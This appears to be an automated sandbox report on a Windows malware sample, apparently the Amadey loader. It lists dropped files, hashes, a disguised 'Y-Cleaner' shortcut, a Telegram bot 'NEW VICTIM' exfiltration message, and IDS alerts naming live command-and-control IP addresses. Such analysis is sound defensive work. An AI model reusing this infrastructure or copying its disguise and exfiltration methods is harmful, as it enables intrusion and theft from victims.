Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................0...........@...........................0......01...@.................................W...k............................0...............................0..................................................... . ............................@....rsrc...............................@....idata ............................@...sfctgzqb..).......).................@...qkipfcli......0.......0.............@....taggant.0....0.."....0.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\mozilla-temp-files\mozilla-temp-41

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.4593089050301797
Encrypted:	false
SSDEEP:	48:9SP0nUgwyZXYI65yFRX2D3GNTTfyn0Mk1iA:9SDKaIjo3UzyE1L
MD5:	D910AD167F0217587501FDCDB33CC544
SHA1:	2F57441CEFDC781011B53C1C5D29AC54835AFC1D
SHA-256:	E3699D9404A3FFC1AFF0CA8A3972DC0EF38BDAB927741E9F627C7C55CEA42E81
SHA-512:	F1871BF28FF25EE52BDB99C7A80AB715C7CAC164DCD2FD87E681168EE927FD2C5E80E03C91BB638D955A4627213BF575FF4D9EECAEDA7718C128CF2CE8F7CB3D
Malicious:	false
Reputation:	unknown
Preview:	... ftypisom....isomiso2avc1mp41....free....mdat..........E...H..,. .#..x264 - core 152 r2851 ba24899 - H.264/MPEG-4 AVC codec - Copyleft 2003-2017 - http://www.videolan.org/x264.html - options: cabac=1 ref=3 deblock=1:0:0 analyse=0x3:0x113 me=hex subme=7 psy=1 psy_rd=1.00:0.00 mixed_ref=1 me_range=16 chroma_me=1 trellis=1 8x8dct=1 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=-2 threads=4 lookahead_threads=1 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=3 b_pyramid=2 b_adapt=1 b_bias=0 direct=1 weightb=1 open_gop=0 weightp=2 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=40 rc=crf mbtree=1 crf=23.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 ip_ratio=1.40 aq=1:1.00......e...+...s\|.kG3...'.u.."...,J.w.~.d\..(K....!.+..;....h....(.T.*...M......0..~L..8..B..A.y..R..,.zBP.';j.@.].w..........c......C=.'f....gI.$^.......m5V.L...{U..%V[....8......B..i..^,....:...,..5.m.%dA....moov...lmvhd...................(...........

C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	308224
Entropy (8bit):	6.2756558263805555
Encrypted:	false
SSDEEP:	6144:b2JEWGoxDtDYL5s/oAg5+Z4vDWcEGpQTMz9J0tYRVmOEe3M5X64:NWGoxDt0LCgArZ4vHEGpQTMz72K4
MD5:	FF1E7643A5C9294BD8E8FD743B323C8F
SHA1:	B35C6E9090B44C2DB2220C5C42C0F68210BA73A9
SHA-256:	25F4451B243D5E5B05EACCF5DD58E3CFCEE7969B145D9AAD7AFF6750AB9A6D0B
SHA-512:	62B1F41DCAB0F4330D761CDBFC4E99E15830B4CDCC44E7788FD15F57F5043EB53E626E009C397DCCE13841E192165C4584CEE0F57C0E5BD5B876F507D051B675
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a\.i%=.:%=.:%=.:,EJ:&=.:%=.:&=.:JKr:-=.:JKC:$=.:JKD:$=.:Rich%=.:................PE..d...`PYg.........."......:...*......\4.........@..........................................@.................................................@h..(.......(.......@....................................................................P.. ............................text....9.......:.................. ..`.rdata.......P.......>..............@..@.data........p......................@....pdata..@............X..............@..@.rsrc...(............\..............@..@.x64.....`.......T...`..................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs-1.js

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (1808), with CRLF line terminators
Category:	dropped
Size (bytes):	10798
Entropy (8bit):	5.4920218144442305
Encrypted:	false
SSDEEP:	192:HnBRN93YbBp6JR1+PaX56/x8lCz9/3/OHNBw82XSl:Deq1M/xbUPw10
MD5:	8E17DA8BAD648FEA72E2285BED47508C
SHA1:	46360B1A01D3BBF20CD5A41959F6F91AB5045099
SHA-256:	F8431B7354A7BEB1C276DBA7B9803AB20FF2D2A162D3623BCAA1773E4987093B
SHA-512:	315FFA8143C121B27822102FCC0D46E525FF978FC3A07D96ABEEA8D28C217C32E23B452B3E63A92E23CFF2757DC9AFDDDD97E0176B02AD41DA0351C0897E908C
Malicious:	false
Reputation:	unknown
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "ecedec8f-7097-47fc-a9e3-d74f0c8e2503");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696499493);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696499494);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.js (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (1808), with CRLF line terminators
Category:	dropped
Size (bytes):	10798
Entropy (8bit):	5.4920218144442305
Encrypted:	false
SSDEEP:	192:HnBRN93YbBp6JR1+PaX56/x8lCz9/3/OHNBw82XSl:Deq1M/xbUPw10
MD5:	8E17DA8BAD648FEA72E2285BED47508C
SHA1:	46360B1A01D3BBF20CD5A41959F6F91AB5045099
SHA-256:	F8431B7354A7BEB1C276DBA7B9803AB20FF2D2A162D3623BCAA1773E4987093B
SHA-512:	315FFA8143C121B27822102FCC0D46E525FF978FC3A07D96ABEEA8D28C217C32E23B452B3E63A92E23CFF2757DC9AFDDDD97E0176B02AD41DA0351C0897E908C
Malicious:	false
Reputation:	unknown
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "ecedec8f-7097-47fc-a9e3-d74f0c8e2503");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696499493);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696499494);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\sessionCheckpoints.json (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.194538242412464
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
MD5:	C4AB2EE59CA41B6D6A6EA911F35BDC00
SHA1:	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
SHA-256:	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
SHA-512:	71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
Malicious:	false
Reputation:	unknown
Preview:	{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\sessionCheckpoints.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.194538242412464
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
MD5:	C4AB2EE59CA41B6D6A6EA911F35BDC00
SHA1:	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
SHA-256:	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
SHA-512:	71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
Malicious:	false
Reputation:	unknown
Preview:	{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

C:\Users\user\Desktop\Cleaner.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Thu Dec 12 14:49:56 2024, mtime=Thu Dec 12 14:49:56 2024, atime=Thu Dec 12 14:49:56 2024, length=1502720, window=hide
Category:	dropped
Size (bytes):	2146
Entropy (8bit):	3.8164292101787867
Encrypted:	false
SSDEEP:	48:8EITyXRfuw8dwkevNuGxGbZkAqG425yg:8ZTyhmPJGN/925y
MD5:	EF5C1C1DBC18972B02102F5B8A323182
SHA1:	772CBBA3BED2BD16C46EAE9034EB9FA24D7D9A82
SHA-256:	7B0FF6B2AFA7E1B489EB70C8BAEA8B3DBC1BA394A53623812D411AABF2AAA10D
SHA-512:	89A700B244BEAAE38FB10929028C772EDE859AA69E379CD9AE4806C947CE6441EF593CADB52882DFF7A644899B459D4649F5BDEB714A9C5A4A0F8D3442FB51C6
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...G..~.L..G..~.L..G..~.L............................:..DG..Yr?.D..U..k0.&...&.........5q.......L..=..~.L......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Y.}...........................c..A.p.p.D.a.t.a...B.P.1......Y"~..Local.<......EW)N.Y"~.............................L.o.c.a.l.....N.1......Y5~..Temp..:......EW)N.Y5~...........................Oz.T.e.m.p.....j.1......Y6~..9D01A5~1..R......Y6~.Y6~..........................XC$.9.D.0.1.A.5.J.f.e.d.0.V.t.J.f.6.....h.2......Y=~ .Y-CLEA~1.EXE..L......Y=~.Y=~..... ........................Y.-.C.l.e.a.n.e.r...e.x.e.......n...............-.......m..............x.....C:\Users\user\AppData\Local\Temp\9D01A5Jfed0VtJf6\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.4.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.9.D.0.1.A.5.J.f.e.d.0.V.t.J.f.6.\.Y.-.C.l.e.a.n.e.r...e.x.e.?.C.:.\.U.s.e.r.s.\.b.r.o.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.9.D.0.1.A.5.J.f.e.d.0.V.t.J.f.6.\.Y.-.C.

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	321
Entropy (8bit):	4.99323851364312
Encrypted:	false
SSDEEP:	6:kX32J19HgIJAuuuthkP//f4IoWzqs4jW1CRW35jY:kWJ1JgIOuHhA/XvoPPWV5k
MD5:	7225D8C283F7B303692A163301880199
SHA1:	7BF7F829E108693DB3DAD66B557EAA1DBA464D94
SHA-256:	19B824BE603626AAD3EB7CAAA5F56F709F22AE80965559A81977DEC9CB22A944
SHA-512:	05125D14C265EED21453D2A6E8007F3BF2C2F339567718AF4F4A20C8EB1474EA73A7656B4EDF13B937B25AB3045601F49D19F8E47521C601FD17D3A218BE0D60
Malicious:	false
Reputation:	unknown
Preview:	{. "ip": "8.46.123.189",. "hostname": "static-cpe-8-46-123-189.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
File Type:	PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	156917
Entropy (8bit):	7.994509354006501
Encrypted:	true
SSDEEP:	3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
MD5:	F89267B24ECF471C16ADD613CEC34473
SHA1:	C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
SHA-256:	21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
SHA-512:	C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
Malicious:	false
Yara Hits:	Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, Author: ditekSHen
Reputation:	unknown
Preview:	.PNG........IHDR................p....IDATx....\|.e....3......D dw6...S..Y.[......#L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.\|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	776
Entropy (8bit):	5.109382611151056
Encrypted:	false
SSDEEP:	24:YKOHPy1JVBa4YGQVPe071kWKfPyoZEB6eiasJENBm9c:YVHPQTBj/Q51QPtZLujMc
MD5:	42F8056A57F782CFF393B8E9E13F08F1
SHA1:	E44D28A44BD197EF7999C27687BAA18675F44B20
SHA-256:	769B0BC81211D2F2256E1613F587C6F450D7BC023F5D21ED558708A3837725AD
SHA-512:	5E1C6C405FFE96DF2719F88A555D4D1410F3E2AC560FC3C99A99D1A1C00AEEE9EAA1DC8AA35488721C68CF57C266F3C81FE742E4C32DC0DFD45ED08430C1969C
Malicious:	false
Reputation:	unknown
Preview:	{"ok":true,"result":{"message_id":3301,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432","username":"kardanvalov88","type":"private"},"date":1734018509,"text":"\ud83d\udd14NEW VICTIM - Extensions Installed\nIP Address: 8.46.123.189\nDevice Name: 921702\nLocation: New York City, New York, US\nWallets:\nNothing found","entities":[{"offset":0,"length":35,"type":"bold"},{"offset":36,"length":11,"type":"bold"},{"offset":48,"length":12,"type":"url"},{"offset":61,"length":12,"type":"bold"},{"offset":81,"length":9,"type":"bold"},{"offset":119,"length":8,"type":"bold"},{"offset":128,"length":13,"type":"code"}]}}

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	278
Entropy (8bit):	3.384674566218411
Encrypted:	false
SSDEEP:	6:HGTYtZTbX37UEZ+lX1CGdKUe6tIxW+Za/y0lNct0:HG437Q1CGAFFc2a/Vut0
MD5:	EBC08995EA16342B4FB8538B610A1E07
SHA1:	EFE04C89415CFEF6C9F7B3785EC7305C4FE28636
SHA-256:	9BC3C83E9580ADC231DEF890451C8545A923C00DB97E7F1685E26689B85E695E
SHA-512:	CD3503D516621F5E24F7B3CF63CA3BDDE8F816679C6FDCBF1C94DE8EAC6C6E04F53C957DD7F7C4F3CA7CFF0E60BB55ADF05A430E20FFCE843A4B6A596C72AE51
Malicious:	false
Reputation:	unknown
Preview:	.....f.....L..lX..}.F.......<... .....s.......... ....................7.C.:.\.U.s.e.r.s.\.b.r.o.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........B.R.O.K.-.P.C.\.b.r.o.k...................0.................0.@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.641399422630559
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	3'189'248 bytes
MD5:	ad7f121646aa374af133772519375710
SHA1:	4e85ad004aa170ed53b7818b78e0b12e042b18ea
SHA256:	d9865442479ec9a282ff312cd91481710f9b6e21330be30a68fa16bf36c0799f
SHA512:	fbe1dfd40bc2fa8c6617823d32023dba5625c5e7cb235f87b284f1166a30d64e75781e80b2586e4a6f7ada4cda9df3e17f1d61829705647c71232a2f902c81c3
SSDEEP:	49152:6UAh2jV6Tj3t5FH+2Qy0GsO7wXRzFxa73lx5:6UAh2jVej3jFH+2QyQO7ghO35
TLSH:	DCE52891AA0663CFE45A237C9627CE435C6C03B9571449C3F86C78BBBE63CD512B5E28
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x70b000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F7E2CEA8BEAh
js 00007F7E2CEA8C16h
add byte ptr [eax], al
jmp 00007F7E2CEAABE5h
add byte ptr [edi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x388	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x309df0	0x10	sfctgzqb
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x309da0	0x18	sfctgzqb
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x68000	63658e0d832a4a261ceb297144a82607	False	0.5632159893329327	data	7.111669260859514	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x388	0x400	514f5782f497fa171df6168314823de0	False	0.453125	data	5.340697973950139	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
sfctgzqb	0x6b000	0x29f000	0x29ee00	1239c2cb74d1e16cbbfafd3e935521bd	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
qkipfcli	0x30a000	0x1000	0x400	d8f5002ce3fa87537f56038d4074eb9f	False	0.7509765625	data	5.942885414437009	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x30b000	0x3000	0x2200	068604b7924951fe0cc65747c3030e88	False	0.0625	DOS executable (COM)	0.7691195363365196	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x69070	0x198	ASCII text, with CRLF line terminators			0.5808823529411765
RT_MANIFEST	0x69208	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-12T16:48:06.778525+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.10	49848	185.215.113.43	80	TCP
2024-12-12T16:48:11.236305+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49858	31.41.244.11	80	TCP
2024-12-12T16:48:14.896120+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.10	49856	TCP
2024-12-12T16:48:16.237759+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.10	49868	185.215.113.43	80	TCP
2024-12-12T16:48:17.714552+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49872	31.41.244.11	80	TCP
2024-12-12T16:48:22.811575+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.10	49884	185.215.113.43	80	TCP
2024-12-12T16:48:24.265874+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49890	31.41.244.11	80	TCP
2024-12-12T16:48:29.278884+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.10	49904	185.215.113.43	80	TCP
2024-12-12T16:48:30.727587+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49912	31.41.244.11	80	TCP
2024-12-12T16:48:35.207517+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.10	49926	185.215.113.43	80	TCP
2024-12-12T16:48:36.675555+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49931	31.41.244.11	80	TCP
2024-12-12T16:48:37.185345+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	49933	185.81.68.147	80	TCP
2024-12-12T16:48:37.185345+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	49933	185.81.68.147	80	TCP
2024-12-12T16:48:37.185345+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	49933	185.81.68.147	80	TCP
2024-12-12T16:48:37.429929+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	49938	185.81.68.147	80	TCP
2024-12-12T16:48:37.429929+0100	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	1	192.168.2.10	49938	185.81.68.147	80	TCP
2024-12-12T16:48:37.429929+0100	2022986	ET MALWARE Generic Request to gate.php Dotted-Quad	1	192.168.2.10	49938	185.81.68.147	80	TCP
2024-12-12T16:48:39.209260+0100	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	1	192.168.2.10	49943	185.81.68.147	80	TCP
